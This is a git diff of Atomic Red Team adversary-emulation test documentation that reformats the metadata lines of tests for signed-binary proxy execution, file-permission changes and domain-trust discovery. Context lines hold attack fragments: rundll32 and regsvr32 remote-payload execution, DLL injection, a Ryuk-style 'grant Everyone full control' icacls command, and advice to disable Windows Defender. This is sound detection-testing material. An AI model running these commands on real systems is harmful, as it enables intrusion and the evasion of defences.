## Atomic Test #9 - Invoke HTML Application - Simulate Lateral Movement over UNC Path - -auto_generated_guid: b8a8bdb2-7eae-490d-8251-d5e0295b2362 - Executes an HTA Application with Simulate lateral movement over UNC Path. + **Supported Platforms:** Windows +**auto_generated_guid:** b8a8bdb2-7eae-490d-8251-d5e0295b2362 + + + #### Inputs: diff --git a/atomics/T1218.007/T1218.007.md b/atomics/T1218.007/T1218.007.md index e6629801..6af04be4 100644 --- a/atomics/T1218.007/T1218.007.md +++ b/atomics/T1218.007/T1218.007.md @@ -16,13 +16,15 @@ Adversaries may abuse msiexec.exe to launch local or network accessible MSI file
## Atomic Test #1 - Msiexec.exe - Execute Local MSI file - -auto_generated_guid: 0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8 - Execute arbitrary MSI file. Commonly seen in application installation. The MSI opens notepad.exe when sucessfully executed. + **Supported Platforms:** Windows +**auto_generated_guid:** 0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8 + + + #### Inputs: @@ -59,13 +61,15 @@ Write-Host "You must provide your own MSI"
## Atomic Test #2 - Msiexec.exe - Execute Remote MSI file - -auto_generated_guid: bde7d2fe-d049-458d-a362-abda32a7e649 - Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution. The MSI opens notepad.exe when sucessfully executed. + **Supported Platforms:** Windows +**auto_generated_guid:** bde7d2fe-d049-458d-a362-abda32a7e649 + + + #### Inputs: @@ -90,15 +94,17 @@ msiexec.exe /q /i "#{msi_payload}"
## Atomic Test #3 - Msiexec.exe - Execute Arbitrary DLL - -auto_generated_guid: 66f64bd5-7c35-4c24-953a-04ca30a0a0ec - Execute arbitrary DLL file stored locally. Commonly seen in application installation. Upon execution, a window titled "Boom!" will open that says "Locked and Loaded!". For 32 bit systems change the dll_payload argument to the Win32 folder. By default, if the src folder is not in place, it will download the 64 bit version. + **Supported Platforms:** Windows +**auto_generated_guid:** 66f64bd5-7c35-4c24-953a-04ca30a0a0ec + + + #### Inputs: diff --git a/atomics/T1218.008/T1218.008.md b/atomics/T1218.008/T1218.008.md index a05669ab..4f5b72e6 100644 --- a/atomics/T1218.008/T1218.008.md +++ b/atomics/T1218.008/T1218.008.md @@ -13,13 +13,15 @@ Adversaries may abuse odbcconf.exe to bypass application control solutions that
## Atomic Test #1 - Odbcconf.exe - Execute Arbitrary DLL - -auto_generated_guid: 2430498b-06c0-4b92-a448-8ad263c388e2 - Execute arbitrary DLL file stored locally. + **Supported Platforms:** Windows +**auto_generated_guid:** 2430498b-06c0-4b92-a448-8ad263c388e2 + + + #### Inputs: diff --git a/atomics/T1218.009/T1218.009.md b/atomics/T1218.009/T1218.009.md index 14171284..d2b8d2e2 100644 --- a/atomics/T1218.009/T1218.009.md +++ b/atomics/T1218.009/T1218.009.md @@ -14,13 +14,15 @@ Both utilities may be used to bypass application control through use of attribut
## Atomic Test #1 - Regasm Uninstall Method Call Test - -auto_generated_guid: 71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112 - Executes the Uninstall Method, No Admin Rights Required. Upon execution, "I shouldn't really execute either." will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112 + + + #### Inputs: @@ -64,14 +66,16 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - Regsvcs Uninstall Method Call Test - -auto_generated_guid: fd3c1c6a-02d2-4b72-82d9-71c527abb126 - Executes the Uninstall Method, No Admin Rights Required, Requires SNK. Upon execution, "I shouldn't really execute" will be displayed along with other information about the assembly being installed. + **Supported Platforms:** Windows +**auto_generated_guid:** fd3c1c6a-02d2-4b72-82d9-71c527abb126 + + + #### Inputs: diff --git a/atomics/T1218.010/T1218.010.md b/atomics/T1218.010/T1218.010.md index e63f0519..b2a345a8 100644 --- a/atomics/T1218.010/T1218.010.md +++ b/atomics/T1218.010/T1218.010.md @@ -22,13 +22,15 @@ Regsvr32.exe can also be leveraged to register a COM Object used to establish pe
## Atomic Test #1 - Regsvr32 local COM scriptlet execution - -auto_generated_guid: 449aa403-6aba-47ce-8a37-247d21ef0306 - Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. + **Supported Platforms:** Windows +**auto_generated_guid:** 449aa403-6aba-47ce-8a37-247d21ef0306 + + + #### Inputs: @@ -68,14 +70,16 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - Regsvr32 remote COM scriptlet execution - -auto_generated_guid: c9d0c4ef-8a96-4794-a75b-3d3a5e6f2a36 - Regsvr32.exe is a command-line program used to register and unregister OLE controls. This test may be blocked by windows defender; disable windows defender real-time protection to fix it. Upon execution, calc.exe will be launched. + **Supported Platforms:** Windows +**auto_generated_guid:** c9d0c4ef-8a96-4794-a75b-3d3a5e6f2a36 + + + #### Inputs: @@ -102,13 +106,15 @@ windows defender real-time protection to fix it. Upon execution, calc.exe will b
## Atomic Test #3 - Regsvr32 local DLL execution - -auto_generated_guid: 08ffca73-9a3d-471a-aeb0-68b4aa3ab37b - Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. + **Supported Platforms:** Windows +**auto_generated_guid:** 08ffca73-9a3d-471a-aeb0-68b4aa3ab37b + + + #### Inputs: @@ -148,13 +154,15 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #4 - Regsvr32 Registering Non DLL - -auto_generated_guid: 1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421 - Replicating observed Gozi maldoc behavior registering a dll with an altered extension + **Supported Platforms:** Windows +**auto_generated_guid:** 1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421 + + + #### Inputs: @@ -197,13 +205,15 @@ copy "C:\Windows\System32\shell32.dll" "#{dll_file}"
## Atomic Test #5 - Regsvr32 Silent DLL Install Call DllRegisterServer - -auto_generated_guid: 9d71c492-ea2e-4c08-af16-c6994cdf029f - Regsvr32.exe is a command-line program used to register and unregister OLE controls. Normally, an install is executed with /n to prevent calling DllRegisterServer. + **Supported Platforms:** Windows +**auto_generated_guid:** 9d71c492-ea2e-4c08-af16-c6994cdf029f + + + #### Inputs: diff --git a/atomics/T1218.011/T1218.011.md b/atomics/T1218.011/T1218.011.md index 9af355b7..ce2c66cb 100644 --- a/atomics/T1218.011/T1218.011.md +++ b/atomics/T1218.011/T1218.011.md @@ -28,13 +28,15 @@ Rundll32 can also be used to execute scripts such as JavaScript. This can be don
## Atomic Test #1 - Rundll32 execute JavaScript Remote Payload With GetObject - -auto_generated_guid: cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be - Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. + **Supported Platforms:** Windows +**auto_generated_guid:** cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be + + + #### Inputs: @@ -59,15 +61,17 @@ rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObj
## Atomic Test #2 - Rundll32 execute VBscript command - -auto_generated_guid: 638730e7-7aed-43dc-bf8c-8117f805f5bb - Test execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test. Technique documented by Hexacorn- http://www.hexacorn.com/blog/2019/10/29/rundll32-with-a-vbscript-protocol/ Upon execution calc.exe will be launched + **Supported Platforms:** Windows +**auto_generated_guid:** 638730e7-7aed-43dc-bf8c-8117f805f5bb + + + #### Inputs: @@ -92,15 +96,17 @@ rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.
## Atomic Test #3 - Rundll32 advpack.dll Execution - -auto_generated_guid: d91cae26-7fc1-457b-a854-34c8aad48c89 - Test execution of a command using rundll32.exe with advpack.dll. Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Advpack.yml Upon execution calc.exe will be launched + **Supported Platforms:** Windows +**auto_generated_guid:** d91cae26-7fc1-457b-a854-34c8aad48c89 + + + #### Inputs: @@ -138,16 +144,18 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #4 - Rundll32 ieadvpack.dll Execution - -auto_generated_guid: 5e46a58e-cbf6-45ef-a289-ed7754603df9 - Test execution of a command using rundll32.exe with ieadvpack.dll. Upon execution calc.exe will be launched Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Ieadvpack.yml + **Supported Platforms:** Windows +**auto_generated_guid:** 5e46a58e-cbf6-45ef-a289-ed7754603df9 + + + #### Inputs: @@ -185,15 +193,17 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #5 - Rundll32 syssetup.dll Execution - -auto_generated_guid: 41fa324a-3946-401e-bbdd-d7991c628125 - Test execution of a command using rundll32.exe with syssetup.dll. Upon execution, a window saying "installation failed" will be opened Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Syssetup.yml + **Supported Platforms:** Windows +**auto_generated_guid:** 41fa324a-3946-401e-bbdd-d7991c628125 + + + #### Inputs: @@ -231,15 +241,17 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #6 - Rundll32 setupapi.dll Execution - -auto_generated_guid: 71d771cd-d6b3-4f34-bc76-a63d47a10b19 - Test execution of a command using rundll32.exe with setupapi.dll. Upon execution, a windows saying "installation failed" will be opened Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Setupapi.yml + **Supported Platforms:** Windows +**auto_generated_guid:** 71d771cd-d6b3-4f34-bc76-a63d47a10b19 + + + #### Inputs: @@ -277,18 +289,20 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #7 - Execution of HTA and VBS Files using Rundll32 and URL.dll - -auto_generated_guid: 22cfde89-befe-4e15-9753-47306b37a6e3 - IcedID uses this TTP as follows: rundll32.exe url.dll,OpenURL %PUBLIC%\index.hta Trickbot uses this TTP as follows: rundll32.exe URL.dll,FileProtocolHandler C:\\..\\Detail\\akteullen.vbs In this atomic, the sample hta file opens the calculator and the vbs file shows a message dialog with "rundll32 spawned wscript" + **Supported Platforms:** Windows +**auto_generated_guid:** 22cfde89-befe-4e15-9753-47306b37a6e3 + + + @@ -309,13 +323,15 @@ rundll32.exe URL.dll,FileProtocolHandler PathToAtomicsFolder\T1218.011\src\akteu
## Atomic Test #8 - Launches an executable using Rundll32 and pcwutl.dll - -auto_generated_guid: 9f5d081a-ee5a-42f9-a04e-b7bdc487e676 - Executes the LaunchApplication function in pcwutl.dll to proxy execution of an executable. + **Supported Platforms:** Windows +**auto_generated_guid:** 9f5d081a-ee5a-42f9-a04e-b7bdc487e676 + + + #### Inputs: diff --git a/atomics/T1218/T1218.md b/atomics/T1218/T1218.md index cc3c2998..49ffa97d 100644 --- a/atomics/T1218/T1218.md +++ b/atomics/T1218/T1218.md @@ -24,13 +24,15 @@
## Atomic Test #1 - mavinject - Inject DLL into running process - -auto_generated_guid: c426dacf-575d-4937-8611-a148a86a5e61 - Injects arbitrary DLL into running process specified by process ID. Requires Windows 10. + **Supported Platforms:** Windows +**auto_generated_guid:** c426dacf-575d-4937-8611-a148a86a5e61 + + + #### Inputs: @@ -69,13 +71,15 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - SyncAppvPublishingServer - Execute arbitrary PowerShell code - -auto_generated_guid: d590097e-d402-44e2-ad72-2c6aa1ce78b1 - Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires Windows 10. + **Supported Platforms:** Windows +**auto_generated_guid:** d590097e-d402-44e2-ad72-2c6aa1ce78b1 + + + #### Inputs: @@ -100,13 +104,15 @@ SyncAppvPublishingServer.exe "n; #{powershell_code}"
## Atomic Test #3 - Register-CimProvider - Execute evil dll - -auto_generated_guid: ad2c17ed-f626-4061-b21e-b9804a6f3655 - Execute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can be served up via SMB + **Supported Platforms:** Windows +**auto_generated_guid:** ad2c17ed-f626-4061-b21e-b9804a6f3655 + + + #### Inputs: @@ -144,15 +150,17 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #4 - InfDefaultInstall.exe .inf Execution - -auto_generated_guid: 54ad7d5a-a1b5-472c-b6c4-f8090fb2daef - Test execution of a .inf using InfDefaultInstall.exe Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Infdefaultinstall.yml + **Supported Platforms:** Windows +**auto_generated_guid:** 54ad7d5a-a1b5-472c-b6c4-f8090fb2daef + + + #### Inputs: @@ -190,13 +198,15 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #5 - ProtocolHandler.exe Downloaded a Suspicious File - -auto_generated_guid: db020456-125b-4c8b-a4a7-487df8afb5a2 - Emulates attack via documents through protocol handler in Microsoft Office. On successful execution you should see Microsoft Word launch a blank file. + **Supported Platforms:** Windows +**auto_generated_guid:** db020456-125b-4c8b-a4a7-487df8afb5a2 + + + #### Inputs: @@ -234,13 +244,15 @@ write-host "Install Microsoft Word or provide correct path."
## Atomic Test #6 - Microsoft.Workflow.Compiler.exe Payload Execution - -auto_generated_guid: 7cbb0f26-a4c1-4f77-b180-a009aa05637e - Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe + **Supported Platforms:** Windows +**auto_generated_guid:** 7cbb0f26-a4c1-4f77-b180-a009aa05637e + + + #### Inputs: @@ -279,13 +291,15 @@ write-host ".Net must be installed for this test to work correctly."
## Atomic Test #7 - Renamed Microsoft.Workflow.Compiler.exe Payload Executions - -auto_generated_guid: 4cc40fd7-87b8-4b16-b2d7-57534b86b911 - Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe + **Supported Platforms:** Windows +**auto_generated_guid:** 4cc40fd7-87b8-4b16-b2d7-57534b86b911 + + + #### Inputs: @@ -326,9 +340,6 @@ write-host "you need to rename workflow complier before you run this test"
## Atomic Test #8 - Invoke-ATHRemoteFXvGPUDisablementCommand base test - -auto_generated_guid: 9ebe7901-7edf-45c0-b5c7-8366300919db - RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339). One of the PowerShell functions called by RemoteFXvGPUDisablement.exe is Get-VMRemoteFXPhysicalVideoAdapter, a part of the Hyper-V module. This atomic test influences RemoteFXvGPUDisablement.exe to execute custom PowerShell code by using a technique referred to as "PowerShell module load-order hijacking" where a module containing, in this case, an implementation of the Get-VMRemoteFXPhysicalVideoAdapter is loaded first by way of introducing a temporary module into the first directory listed in the %PSModulePath% environment variable or within a user-specified module directory outside of %PSModulePath%. Upon execution the temporary module is deleted. @@ -338,9 +349,14 @@ Invoke-ATHRemoteFXvGPUDisablementCommand is used in this test to demonstrate how The Invoke-ATHRemoteFXvGPUDisablementCommand function outputs all relevant execution-related artifacts. Reference: https://github.com/redcanaryco/AtomicTestHarnesses/blob/master/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1 + **Supported Platforms:** Windows +**auto_generated_guid:** 9ebe7901-7edf-45c0-b5c7-8366300919db + + + #### Inputs: diff --git a/atomics/T1219/T1219.md b/atomics/T1219/T1219.md index b22acd43..58c028d8 100644 --- a/atomics/T1219/T1219.md +++ b/atomics/T1219/T1219.md @@ -18,13 +18,15 @@ Admin tools such as TeamViewer have been used by several groups targeting instit
## Atomic Test #1 - TeamViewer Files Detected Test on Windows - -auto_generated_guid: 8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0 - An adversary may attempt to trick the user into downloading teamviewer and using this to maintain access to the machine. Download of TeamViewer installer will be at the destination location when sucessfully executed. + **Supported Platforms:** Windows +**auto_generated_guid:** 8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0 + + + @@ -54,13 +56,15 @@ Remove-Item $file1 -ErrorAction Ignore | Out-Null
## Atomic Test #2 - AnyDesk Files Detected Test on Windows - -auto_generated_guid: 6b8b7391-5c0a-4f8c-baee-78d8ce0ce330 - An adversary may attempt to trick the user into downloading AnyDesk and use to establish C2. Download of AnyDesk installer will be at the destination location and ran when sucessfully executed. + **Supported Platforms:** Windows +**auto_generated_guid:** 6b8b7391-5c0a-4f8c-baee-78d8ce0ce330 + + + @@ -87,13 +91,15 @@ Remove-Item $file1 -ErrorAction Ignore
## Atomic Test #3 - LogMeIn Files Detected Test on Windows - -auto_generated_guid: d03683ec-aae0-42f9-9b4c-534780e0f8e1 - An adversary may attempt to trick the user into downloading LogMeIn and use to establish C2. Download of LogMeIn installer will be at the destination location and ran when sucessfully executed. + **Supported Platforms:** Windows +**auto_generated_guid:** d03683ec-aae0-42f9-9b4c-534780e0f8e1 + + + diff --git a/atomics/T1220/T1220.md b/atomics/T1220/T1220.md index 43a4c44f..c88966ce 100644 --- a/atomics/T1220/T1220.md +++ b/atomics/T1220/T1220.md @@ -31,13 +31,15 @@ Command-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic)
## Atomic Test #1 - MSXSL Bypass using local files - -auto_generated_guid: ca23bfb2-023f-49c5-8802-e66997de462d - Executes the code specified within a XSL script tag during XSL transformation using a local payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714. Open Calculator.exe when test sucessfully executed, while AV turned off. + **Supported Platforms:** Windows +**auto_generated_guid:** ca23bfb2-023f-49c5-8802-e66997de462d + + + #### Inputs: @@ -86,13 +88,15 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - MSXSL Bypass using remote files - -auto_generated_guid: a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985 - Executes the code specified within a XSL script tag during XSL transformation using a remote payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714. Open Calculator.exe when test sucessfully executed, while AV turned off. + **Supported Platforms:** Windows +**auto_generated_guid:** a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985 + + + #### Inputs: @@ -118,13 +122,15 @@ C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
## Atomic Test #3 - WMIC bypass using local XSL file - -auto_generated_guid: 1b237334-3e21-4a0c-8178-b8c996124988 - Executes the code specified within a XSL script using a local payload. + **Supported Platforms:** Windows +**auto_generated_guid:** 1b237334-3e21-4a0c-8178-b8c996124988 + + + #### Inputs: @@ -163,13 +169,15 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #4 - WMIC bypass using remote XSL file - -auto_generated_guid: 7f5be499-33be-4129-a560-66021f379b9b - Executes the code specified within a XSL script using a remote payload. Open Calculator.exe when test sucessfully executed, while AV turned off. + **Supported Platforms:** Windows +**auto_generated_guid:** 7f5be499-33be-4129-a560-66021f379b9b + + + #### Inputs: diff --git a/atomics/T1221/T1221.md b/atomics/T1221/T1221.md index 3c8a6061..d39205df 100644 --- a/atomics/T1221/T1221.md +++ b/atomics/T1221/T1221.md @@ -16,16 +16,18 @@ This technique may also enable [Forced Authentication](https://attack.mitre.org/
## Atomic Test #1 - WINWORD Remote Template Injection - -auto_generated_guid: 1489e08a-82c7-44ee-b769-51b72d03521d - Open a .docx file that loads a remote .dotm macro enabled template from https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm Executes the code specified within the .dotm template. Requires download of WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx. Default docs file opens Calculator.exe when test sucessfully executed, while AV turned off. + **Supported Platforms:** Windows +**auto_generated_guid:** 1489e08a-82c7-44ee-b769-51b72d03521d + + + #### Inputs: diff --git a/atomics/T1222.001/T1222.001.md b/atomics/T1222.001/T1222.001.md index 3091fc0d..bbef7697 100644 --- a/atomics/T1222.001/T1222.001.md +++ b/atomics/T1222.001/T1222.001.md @@ -22,14 +22,16 @@ Adversaries can interact with the DACLs using built-in Windows commands, such as
## Atomic Test #1 - Take ownership using takeown utility - -auto_generated_guid: 98d34bb4-6e75-42ad-9c41-1dae7dc6a001 - Modifies the filesystem permissions of the specified file or folder to take ownership of the object. Upon execution, "SUCCESS" will be displayed for the folder and each file inside of it. + **Supported Platforms:** Windows +**auto_generated_guid:** 98d34bb4-6e75-42ad-9c41-1dae7dc6a001 + + + #### Inputs: @@ -68,15 +70,17 @@ echo T1222.001_takeown2 >> #{file_folder_to_own}\T1222.001_takeown2.txt
## Atomic Test #2 - cacls - Grant permission to specified user or group recursively - -auto_generated_guid: a8206bcc-f282-40a9-a389-05d9c0263485 - Modifies the filesystem permissions of the specified folder and contents to allow the specified user or group Full Control. If "Access is denied" is displayed it may be because the file or folder doesn't exit. Run the prereq command to create it. Upon successfull execution, "Successfully processed 3 files" will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** a8206bcc-f282-40a9-a389-05d9c0263485 + + + #### Inputs: @@ -116,14 +120,16 @@ echo T1222.001_cacls2 >> #{file_or_folder}\T1222.001_cacls2.txt
## Atomic Test #3 - attrib - Remove read-only attribute - -auto_generated_guid: bec1e95c-83aa-492e-ab77-60c71bbd21b0 - Removes the read-only attribute from a file or folder using the attrib.exe command. Upon execution, no output will be displayed. Open the file in File Explorer > Right Click - Prperties and observe that the Read Only checkbox is empty. + **Supported Platforms:** Windows +**auto_generated_guid:** bec1e95c-83aa-492e-ab77-60c71bbd21b0 + + + #### Inputs: @@ -164,14 +170,16 @@ attrib.exe +r #{file_or_folder}\T1222.001_attrib2.txt
## Atomic Test #4 - attrib - hide file - -auto_generated_guid: 32b979da-7b68-42c9-9a99-0e39900fc36c - Attackers leverage an existing Windows binary, attrib.exe, to mark specific files or folder as hidden by using specific flags so that the victim does not see the file. + **Supported Platforms:** Windows +**auto_generated_guid:** 32b979da-7b68-42c9-9a99-0e39900fc36c + + + #### Inputs: @@ -218,16 +226,18 @@ echo T1222.001_attrib2 >> #{file_or_folder}\T1222.001_attrib2.txt
## Atomic Test #5 - Grant Full Access to folder for Everyone - Ryuk Ransomware Style - -auto_generated_guid: ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6 - Invokes the command line similar to that used by Ryuk Ransomware to grant full access to the entire C:\ drive for Everyone. **icacls "C:\*" /grant Everyone:F /T /C /Q** However, for this atomic we set the permission on C:\Users\Public so it completes faster and doesn't irreversibly affect the host. You can set your own path variable to "C:\*" if you prefer. + **Supported Platforms:** Windows +**auto_generated_guid:** ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6 + + + #### Inputs: diff --git a/atomics/T1222.002/T1222.002.md b/atomics/T1222.002/T1222.002.md index d433f301..7d70fc6e 100644 --- a/atomics/T1222.002/T1222.002.md +++ b/atomics/T1222.002/T1222.002.md @@ -30,13 +30,15 @@ Adversarial may use these commands to make themselves the owner of files and dir
## Atomic Test #1 - chmod - Change file or folder mode (numeric mode) - -auto_generated_guid: 34ca1464-de9d-40c6-8c77-690adf36a135 - Changes a file or folder's permissions using chmod and a specified numeric mode. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 34ca1464-de9d-40c6-8c77-690adf36a135 + + + #### Inputs: @@ -62,13 +64,15 @@ chmod #{numeric_mode} #{file_or_folder}
## Atomic Test #2 - chmod - Change file or folder mode (symbolic mode) - -auto_generated_guid: fc9d6695-d022-4a80-91b1-381f5c35aff3 - Changes a file or folder's permissions using chmod and a specified symbolic mode. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** fc9d6695-d022-4a80-91b1-381f5c35aff3 + + + #### Inputs: @@ -94,13 +98,15 @@ chmod #{symbolic_mode} #{file_or_folder}
## Atomic Test #3 - chmod - Change file or folder mode (numeric mode) recursively - -auto_generated_guid: ea79f937-4a4d-4348-ace6-9916aec453a4 - Changes a file or folder's permissions recursively using chmod and a specified numeric mode. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** ea79f937-4a4d-4348-ace6-9916aec453a4 + + + #### Inputs: @@ -126,13 +132,15 @@ chmod #{numeric_mode} #{file_or_folder} -R
## Atomic Test #4 - chmod - Change file or folder mode (symbolic mode) recursively - -auto_generated_guid: 0451125c-b5f6-488f-993b-5a32b09f7d8f - Changes a file or folder's permissions recursively using chmod and a specified symbolic mode. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 0451125c-b5f6-488f-993b-5a32b09f7d8f + + + #### Inputs: @@ -158,13 +166,15 @@ chmod #{symbolic_mode} #{file_or_folder} -R
## Atomic Test #5 - chown - Change file or folder ownership and group - -auto_generated_guid: d169e71b-85f9-44ec-8343-27093ff3dfc0 - Changes a file or folder's ownership and group information using chown. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** d169e71b-85f9-44ec-8343-27093ff3dfc0 + + + #### Inputs: @@ -191,13 +201,15 @@ chown #{owner}:#{group} #{file_or_folder}
## Atomic Test #6 - chown - Change file or folder ownership and group recursively - -auto_generated_guid: b78598be-ff39-448f-a463-adbf2a5b7848 - Changes a file or folder's ownership and group information recursively using chown. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** b78598be-ff39-448f-a463-adbf2a5b7848 + + + #### Inputs: @@ -224,13 +236,15 @@ chown #{owner}:#{group} #{file_or_folder} -R
## Atomic Test #7 - chown - Change file or folder mode ownership only - -auto_generated_guid: 967ba79d-f184-4e0e-8d09-6362b3162e99 - Changes a file or folder's ownership only using chown. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 967ba79d-f184-4e0e-8d09-6362b3162e99 + + + #### Inputs: @@ -256,13 +270,15 @@ chown #{owner} #{file_or_folder}
## Atomic Test #8 - chown - Change file or folder ownership recursively - -auto_generated_guid: 3b015515-b3d8-44e9-b8cd-6fa84faf30b2 - Changes a file or folder's ownership only recursively using chown. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 3b015515-b3d8-44e9-b8cd-6fa84faf30b2 + + + #### Inputs: @@ -288,14 +304,16 @@ chown #{owner} #{file_or_folder} -R
## Atomic Test #9 - chattr - Remove immutable file attribute - -auto_generated_guid: e7469fe2-ad41-4382-8965-99b94dd3c13f - Remove's a file's `immutable` attribute using `chattr`. This technique was used by the threat actor Rocke during the compromise of Linux web servers. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** e7469fe2-ad41-4382-8965-99b94dd3c13f + + + #### Inputs: diff --git a/atomics/T1482/T1482.md b/atomics/T1482/T1482.md index 3d3deafa..9eac5248 100644 --- a/atomics/T1482/T1482.md +++ b/atomics/T1482/T1482.md @@ -18,14 +18,16 @@
## Atomic Test #1 - Windows - Discover domain trusts with dsquery - -auto_generated_guid: 4700a710-c821-4e17-a3ec-9e4c81d6845f - Uses the dsquery command to discover domain trusts. Requires the installation of dsquery via Windows RSAT or the Windows Server AD DS role. + **Supported Platforms:** Windows +**auto_generated_guid:** 4700a710-c821-4e17-a3ec-9e4c81d6845f + + + @@ -45,15 +47,17 @@ dsquery * -filter "(objectClass=trustedDomain)" -attr *
## Atomic Test #2 - Windows - Discover domain trusts with nltest - -auto_generated_guid: 2e22641d-0498-48d2-b9ff-c71e496ccdbe - Uses the nltest command to discover domain trusts. Requires the installation of nltest via Windows RSAT or the Windows Server AD DS role. This technique has been used by the Trickbot malware family. + **Supported Platforms:** Windows +**auto_generated_guid:** 2e22641d-0498-48d2-b9ff-c71e496ccdbe + + + @@ -85,14 +89,16 @@ echo Sorry RSAT must be installed manually
## Atomic Test #3 - Powershell enumerate domains and forests - -auto_generated_guid: c58fbc62-8a62-489e-8f2d-3565d7d96f30 - Use powershell to enumerate AD information. Requires the installation of PowerShell AD admin cmdlets via Windows RSAT or the Windows Server AD DS role. + **Supported Platforms:** Windows +**auto_generated_guid:** c58fbc62-8a62-489e-8f2d-3565d7d96f30 + + + @@ -137,14 +143,16 @@ Write-Host "Sorry RSAT must be installed manually"
## Atomic Test #4 - Adfind - Enumerate Active Directory OUs - -auto_generated_guid: d1c73b96-ab87-4031-bad8-0e1b3b8bf3ec - Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory OUs reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html + **Supported Platforms:** Windows +**auto_generated_guid:** d1c73b96-ab87-4031-bad8-0e1b3b8bf3ec + + + #### Inputs: @@ -181,14 +189,16 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
## Atomic Test #5 - Adfind - Enumerate Active Directory Trusts - -auto_generated_guid: 15fe436d-e771-4ff3-b655-2dca9ba52834 - Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Trusts reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html + **Supported Platforms:** Windows +**auto_generated_guid:** 15fe436d-e771-4ff3-b655-2dca9ba52834 + + + #### Inputs: diff --git a/atomics/T1485/T1485.md b/atomics/T1485/T1485.md index 32873bd4..cdb01b5b 100644 --- a/atomics/T1485/T1485.md +++ b/atomics/T1485/T1485.md @@ -18,14 +18,16 @@ In cloud environments, adversaries may leverage access to delete cloud storage,
